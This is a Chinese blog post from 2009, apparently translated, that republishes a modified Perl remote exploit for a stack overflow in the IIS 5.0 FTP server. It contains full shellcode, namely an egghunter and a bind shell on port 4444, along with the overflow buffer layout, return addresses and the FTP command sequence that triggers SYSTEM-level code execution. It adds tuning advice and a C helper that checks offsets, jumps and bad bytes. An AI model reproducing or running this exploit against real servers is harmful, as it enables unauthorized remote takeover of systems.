夜火博客

Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (works on Chinese and English Windows)

Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit, a version that works on both Chinese and English Windows. It opens a bind shell on port 4444 and was tested on Windows 2000 CN + SP4. It needs an FTP user that is allowed to create directories. If the addresses used as offsets are not universal for your target, change them yourself.

#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# Modded by muts, additional egghunter added for secondary larger payload
# Might take a minute or two for the egg to be found.
# Opens bind shell on port 4444
# http://www.offensive-security.com/0day/msftp.pl.txt

use IO::Socket;
$|=1;

# Stage 1: alphanumeric-encoded egghunter. It scans memory for the
# "T00WT00W" tag that is placed in front of $shell.
$sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" .
      "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" .
      "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" .
      "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
      "\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" .
      "\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" .
      "\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" .
      "\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" .
      "\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41";

# Stage 2: bind shell on 4444, generated with
# ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
# (0xff is not in that bad-byte list; the encoded output below happens to contain none.)
$shell = "T00WT00W" .
      "\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" .
      "\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" .
      "\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" .
      "\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" .
      "\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" .
      "\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" .
      "\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" .
      "\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" .
      "\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" .
      "\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" .
      "\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" .
      "\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" .
      "\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" .
      "\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" .
      "\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" .
      "\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" .
      "\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" .
      "\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" .
      "\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" .
      "\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" .
      "\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" .
      "\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" .
      "\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" .
      "\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" .
      "\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90";

print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
    # two arguments: the target host ($ARGV[0]) and our own IP ($ARGV[1])
    print "usage: iiz5.pl <target> <your_ip>\n";
    exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;   # random port for the PORT data channel
$locip = $ARGV[1];
$locip =~ s/\./,/gi;                    # PORT wants a,b,c,d instead of a.b.c.d
if (fork()) {
    $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                  PeerPort => '21',
                                  Proto    => 'tcp');

    # Change the following two addresses yourself to improve portability;
    # these two were tested successfully on my machine.
    $patch   = "\x7e\xd1\xf9\x7f";
    $retaddr = "\x9B\xB1\xF4\x77";
    # You can use these two jump addresses from wordexp instead:
    #$patch   = "\x90\x80\xb7\x6f";
    #$retaddr = "\xcd\x60\xb6\x6f";

    # Modified here as well: two extra "K"s. $myfindsc locates the shellcode with
    # "repne scasd [edi]", which compares one dword at a time and advances EDI by 4,
    # so the "SEXY" tag has to sit on a 4-byte boundary; with "SITE " in front of it,
    # the extra "K"s put it there. Otherwise it is not found (portability?).
    $v = "KKKSEXY" . $sc . "V" x (500-length($sc)-5);

    # Basic stack layout at the time of the overflow (offsets into the original kcope $c):
    #     |0          |104     | 108   |112       |164     |168    |172     |176
    #$c = "A" x 104 . $patch . $patch. "A" x 52 . $patch . "AAAA". $retaddr .$patch."Aa4Aa5Aa6Aa7Aa8Aa9Ab";

    # Source of the $myfindsc stub (MSVC inline asm used to produce the bytes below):
    # void myfindsc()
    # {
    #     __asm
    #     {
    #         int 3;
    # start:
    #         MOV EDX,ESP;
    #         FCMOVNBE ST,ST(2);
    #         _emit 0xd9;
    #         _emit 0x72;
    #         _emit 0xf4;                      ; FNSTENV [edx-0Ch]: EBP := address of FCMOVNBE
    #         POP EBP;
    #         PUSH EBP;
    #         POP EBX;
    #         PUSH 76h;
    #         POP EAX;
    # xorsc:
    #         XOR BYTE PTR DS:[EBX+28h],AL;    ; restore the 0xff of "decode"
    #                                          ; (the byte string below uses 27h: 0x89 ^ 0x76 = 0xff)
    # findsc:
    #         MOV EAX,66666666h;
    #         SUB EAX,66566666h;               ; the byte string below uses 665F6666h: scan starts at 0x70000
    #         PUSH EAX;
    #         POP EDI;
    #         PUSH 21212121h;
    #         POP ECX;
    #         MOV EAX,59584553h;               ; "SEXY"
    #         REPNE SCAS DWORD PTR ES:[EDI];   ; EDI ends up just past the tag, at $sc
    # decode:
    #         _emit 0x89;
    #         _emit 0xE7;                      ; becomes FF E7 = JMP EDI after the XOR above
    #     }
    # }
    #
    # void main()
    # {
    #     myfindsc();
    # }

    # The code that locates the shellcode was changed. It has to reach the shellcode
    # with a call or jmp, and the register forms of those instructions (FF E7 = JMP EDI)
    # contain 0xff, which IIS filters. So the stub is stored with 0x89 in place of the
    # 0xff and patches itself back at run time. alpha2 encoding was the first idea,
    # but the encoded stub came out too long.
    $myfindsc = "\x8b\xd4\xdb\xd2\xd9\x72\xf4\x5d\x55\x5b\x6a\x76\x58" .
                "\x30\x43\x27\xb8\x66\x66\x66\x66\x2d\x66\x66\x5f\x66" .
                "\x50\x5f\x68\x21\x21\x21\x21\x59\xb8\x53\x45\x58\x59" .
                "\xf2\xaf\x89\xe7";

    $c = $myfindsc . "A" x (104 - length($myfindsc)) .
         $patch . $patch . "\xEB\x8E\x44\x44" . "A" x 48 .
         #                  |<-- second hop: control lands here and finally jumps to $myfindsc at offset 0
         $patch . "AAAA" . $retaddr . $patch . "A" x 16 . "\xE2\xAA" . "NN";
         #                                                |<-- first hop: after the function returns, the return
         #                                                     address brings control here; $myfindsc is too far
         #                                                     for one short jump, so it jumps once more

    $x = <$sock>; print $x;
    print $sock "USER anonimoos\r\n"; $x = <$sock>; print $x;
    print $sock "PASS $shell\r\n";    $x = <$sock>; print $x;
    print $sock "USER anonimoos\r\n"; $x = <$sock>; print $x;
    print $sock "PASS $shell\r\n";    $x = <$sock>; print $x;

    print $sock "USER anonymous\r\n"; $x = <$sock>; print $x;
    print $sock "PASS anonymous\r\n"; $x = <$sock>; print $x;
    print $sock "MKD w00t$port\r\n";  $x = <$sock>; print $x;
    # We store shellcode in memory of process (stack)
    print $sock "SITE $v\r\n"; $x = <$sock>; print $x;
    print $sock "SITE $v\r\n"; $x = <$sock>; print $x;
    print $sock "SITE $v\r\n"; $x = <$sock>; print $x;
    print $sock "SITE $v\r\n"; $x = <$sock>; print $x;
    print $sock "SITE $v\r\n"; $x = <$sock>; print $x;
    print $sock "CWD w00t$port\r\n"; $x = <$sock>; print $x;
    # Modified here as well: one extra "C" for 4-byte alignment
    print $sock "MKD CCCC" . "$c\r\n"; $x = <$sock>; print $x;
    print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
    $x = <$sock>; print $x;

    # TRIGGER
    print $sock "NLST $c*/../C*/\r\n"; $x = <$sock>; print $x;
} else {
    # child: listen for the data connection the server opens in response to PORT
    my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0",
                                         LocalPort => $port,
                                         Proto     => 'tcp',
                                         Listen    => 1);
    die "Could not create socket: $!\n" unless $servsock;
    my $new_sock = $servsock->accept();
    while(<$new_sock>) { print $_; }
    close($servsock);
}
#Cheerio,
#Kingcope
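The layout arithmetic above is easy to get wrong when you move $myfindsc or change the padding, so here is an added example in C that checks it offline. It is not part of the original exploit or of this post. It rebuilds the 200-byte $c buffer with the same offsets (stub at 0, the two $patch dwords at 104 and 108, the short jmp at 112, the return address at 172, the loop at 196), resolves each rel8 displacement the way the CPU does (offset of the next instruction plus the sign-extended byte), checks the stub and buffer against the bytes the post treats as unusable (0x00, 0x0a, 0x0d and the filtered 0xff), verifies that the XOR at EBX+0x27 turns 89 E7 into FF E7 (JMP EDI), and emulates the dword-stride "repne scasd" search over a constructed command buffer to show why "SEXY" has to be 4-byte aligned. The PPPP/RRRR placeholders stand in for the target-specific $patch and $retaddr values, and the assumption that the "SITE " command buffer starts on a dword boundary is the post's, not a verified property of IIS.

```c
/* Added example, not from the original exploit: offline checks for the $c layout,
 * the two short-jump hops, the byte filter and the dword-stride egg search. */
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* $myfindsc, copied byte-for-byte from the script (43 bytes). */
static const uint8_t myfindsc[] = {
    0x8b,0xd4,0xdb,0xd2,0xd9,0x72,0xf4,0x5d,0x55,0x5b,0x6a,0x76,0x58,
    0x30,0x43,0x27,0xb8,0x66,0x66,0x66,0x66,0x2d,0x66,0x66,0x5f,0x66,
    0x50,0x5f,0x68,0x21,0x21,0x21,0x21,0x59,0xb8,0x53,0x45,0x58,0x59,
    0xf2,0xaf,0x89,0xe7
};
#define MYFINDSC_LEN ((int)sizeof(myfindsc))
#define C_LEN 200

/* Placeholders for the target-specific $patch / $retaddr dwords (assumption). */
static const uint8_t PATCH[4]   = { 'P','P','P','P' };
static const uint8_t RETADDR[4] = { 'R','R','R','R' };

/* Build $c exactly as the script concatenates it; returns the length (200). */
int build_c(uint8_t *c) {
    int i = 0;
    memcpy(c, myfindsc, MYFINDSC_LEN);
    memset(c + MYFINDSC_LEN, 'A', 104 - MYFINDSC_LEN); i = 104;
    memcpy(c + i, PATCH, 4);   i += 4;              /* 104 */
    memcpy(c + i, PATCH, 4);   i += 4;              /* 108 */
    const uint8_t hop2[4] = { 0xEB, 0x8E, 0x44, 0x44 };
    memcpy(c + i, hop2, 4);    i += 4;              /* 112: jmp short -0x72 */
    memset(c + i, 'A', 48);    i += 48;             /* 116..163 */
    memcpy(c + i, PATCH, 4);   i += 4;              /* 164 */
    memset(c + i, 'A', 4);     i += 4;              /* 168 */
    memcpy(c + i, RETADDR, 4); i += 4;              /* 172: saved return address */
    memcpy(c + i, PATCH, 4);   i += 4;              /* 176 */
    memset(c + i, 'A', 16);    i += 16;             /* 180..195 */
    c[i++] = 0xE2; c[i++] = 0xAA;                   /* 196: loop rel8 = -0x56 */
    c[i++] = 'N';  c[i++] = 'N';                    /* 198 */
    return i;
}

/* Resolve a 2-byte rel8 branch (EB xx or E2 xx) at offset `at`:
 * target = offset of the next instruction + sign-extended displacement. */
int rel8_target(const uint8_t *c, int at) {
    int8_t disp = (int8_t)c[at + 1];
    return at + 2 + disp;
}

/* 1 if any byte is one the post treats as unusable in the command. */
int has_bad_byte(const uint8_t *p, int n) {
    for (int k = 0; k < n; k++)
        if (p[k] == 0x00 || p[k] == 0x0a || p[k] == 0x0d || p[k] == 0xff) return 1;
    return 0;
}

/* Apply the stub's own XOR: EBX = &stub[2] (the FPU EIP saved by fnstenv points at
 * FCMOVNBE), so EBX+0x27 is stub[41], the 0x89 in front of 0xE7. */
int patched_is_jmp_edi(void) {
    uint8_t s[MYFINDSC_LEN];
    memcpy(s, myfindsc, sizeof s);
    s[2 + 0x27] ^= 0x76;
    return s[41] == 0xff && s[42] == 0xe7;
}

#define EGG_SEXY 0x59584553u   /* "SEXY" as mov eax,59584553h reads it */

/* Emulate "repne scasd" from a dword-aligned EDI: compare 4 bytes, step by 4.
 * Returns the offset just past the egg (what EDI holds when JMP EDI runs), or -1. */
int scasd_find(const uint8_t *mem, int len, uint32_t egg) {
    for (int edi = 0; edi + 4 <= len; edi += 4) {
        uint32_t v = (uint32_t)mem[edi] | (uint32_t)mem[edi+1] << 8 |
                     (uint32_t)mem[edi+2] << 16 | (uint32_t)mem[edi+3] << 24;
        if (v == egg) return edi + 4;
    }
    return -1;
}

/* Constructed command buffer "SITE " + nk x 'K' + "SEXY" + payload, assuming
 * the buffer itself starts on a dword boundary. nk=3 is the post's "KKKSEXY",
 * nk=1 is the original "KSEXY". */
int egg_offset_after_prefix(int nk) {
    uint8_t mem[64];
    memset(mem, 'V', sizeof mem);                 /* stand-in for $sc */
    int i = 5;
    memcpy(mem, "SITE ", 5);
    for (int k = 0; k < nk; k++) mem[i++] = 'K';
    memcpy(mem + i, "SEXY", 4);
    return scasd_find(mem, sizeof mem, EGG_SEXY);
}

int main(void) {
    uint8_t c[C_LEN];
    int n = build_c(c);
    printf("len=%d  loop@196 -> %d  jmp@112 -> %d  bad=%d  jmp edi=%d\n",
           n, rel8_target(c, 196), rel8_target(c, 112), has_bad_byte(c, n),
           patched_is_jmp_edi());
    printf("KKKSEXY found at +%d, KSEXY found at %d\n",
           egg_offset_after_prefix(3), egg_offset_after_prefix(1));
    return 0;
}
```

With the script's bytes the chain resolves as the comments in $c describe: the loop at 196 lands on 112, the jmp at 112 lands on 0, and the tag is only hit with the three K's. If you substitute your own $patch/$retaddr, run has_bad_byte over them as well; the addresses the post uses (7e d1 f9 7f and 9b b1 f4 77) pass that filter.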

via baicker

Article title: Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (works on Chinese and English Windows)
Author: 夜火
Published: 2009-10-01